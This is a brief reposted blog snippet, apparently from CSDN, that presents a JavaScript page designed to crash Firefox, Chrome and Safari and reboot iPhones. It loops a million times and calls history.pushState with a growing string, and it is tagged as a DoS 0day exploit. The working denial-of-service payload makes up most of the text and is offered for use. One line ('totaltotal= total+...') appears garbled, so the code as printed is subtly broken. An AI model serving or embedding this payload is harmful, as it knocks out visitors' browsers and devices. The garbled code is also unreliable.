5行搞死浏览器经典代码

Crash firefox, chrome, safari browsers, and also restart iphone using this javascript code. #dos #0day #exploit

//使用下面这段JavaScript代码能让firefox,chrome,safari浏览器崩溃,而且还能让iphone重启。

  1. <html> 
  2. <body> 
  3. <script> 
  4. var total="";  
  5. for (var i=0;i<1000000;i++)  
  6. {  
  7.     totaltotal= total+i.toString();  
  8.     history.pushState(0,0,total);  
  9. }  
  10. </script> 
  11. </body> 
  12. </html> 

猜你喜欢

转载自blog.csdn.net/u014505277/article/details/50560071